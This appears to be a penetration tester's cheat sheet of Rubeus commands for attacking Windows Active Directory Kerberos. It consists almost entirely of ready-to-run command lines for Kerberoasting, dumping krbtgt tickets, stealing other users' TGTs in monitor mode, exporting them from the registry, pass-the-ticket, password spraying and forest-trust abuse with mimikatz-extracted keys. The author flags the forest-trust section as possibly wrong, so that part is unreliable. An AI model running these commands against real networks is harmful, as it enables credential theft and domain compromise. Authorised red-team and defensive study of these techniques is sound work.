Rubeus.exe
Kerberoasting attack
rubeus.exe kerberoast /simple /outfile:kerberoast.txt
Dump tickets
rubeus.exe dump /service:krbtgt /nowrap
Monitor mode
This is handy when you're WinRM'd into a box with local/domain admin creds and you want to steal other TGTs:
rubeus monitor /interval:5 /nowrap /runfor:60 /registry:SOFTWARE\MONITOR
Extracting TGTs from registry hives after monitor mode attack
Once you've done the monitor "attack" and captured TGTs to the registry, use reg.exe to extract them.
Grab the TGTs from registry
reg export HKLM\SOFTWARE\MONITOR backup1.reg
Once you have the TGTs, use something like rubeus2ccache to convert to kirbi or ccache (reference). Then you can use rubeus to pass the TGT.
Pass-the-ticket
rubeus.exe ptt /ticket:xxx
Password spraying
rubeus.exe spray /password:MySprayedPass2024! /domain:domain.com /dc:1.2.3.4 /outfile:successful-sprays.txt
Request a TGT
rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap
Note: if doing asktgt for a domain controller be sure to use the trailing dollar sign, i.e. DC01$
Request a TGT when abusing forest trusts [ UNDER REVIEW ]
I was working on this in a lab and don't think this section below is right, so ignore it until further review.
If you're in a situation where you've got DA on DOMAIN2.COM and want to abuse that to pwn DOMAIN1.COM, and you've extracted domain SIDs with get-adobject and you've extracted trust keys with mimikatz, you can do something like this to request a TGT for the pwned domain:
rubeus.exe asktgt /user:domain2$ /domain:domain1.com /rc4:THE-rc4_hmac_nt-YOU-EXTRACTED-WITH-MIMIKATZ
Describe a ticket
rubeus.exe describe /ticket:base64ticket
This came in real handy during an engagement where I had lifted a TGT from a system and was trying to pass it and use it and was getting all sorts of errors. When I ran the describe command the output said KeyType=180 which I learned means credential guard is in place and that ticket won't work anywhere else but the box it came from!